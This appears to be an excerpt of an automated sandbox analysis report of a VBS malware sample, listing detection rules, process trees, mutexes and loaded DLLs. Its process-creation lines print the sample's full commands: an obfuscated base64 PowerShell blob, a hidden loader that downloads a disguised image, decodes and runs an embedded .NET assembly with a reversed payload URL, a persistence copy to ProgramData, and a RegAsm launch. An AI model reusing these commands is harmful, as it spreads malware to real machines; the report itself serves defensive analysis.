Source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winVBS@13/10@8/4

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FIwXa[1].txt

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\0VZWHbNr1OapRPc5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bd31duw1.ibv.ps1

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Name_File.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Name_File.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
